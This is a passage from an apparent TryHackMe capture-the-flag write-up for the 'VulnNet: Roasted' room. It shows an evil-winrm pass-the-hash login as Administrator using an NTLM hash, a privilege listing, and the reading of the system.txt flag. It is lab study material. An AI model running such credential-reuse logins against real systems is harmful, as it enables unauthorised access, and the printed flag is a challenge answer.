Login as Admin to Windows¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ evil-winrm -i 10.10.106.55 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; whoami /priv
vulnnet-rst\administrator
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:34 PM 39 system.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Read flag: system.txt¶
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}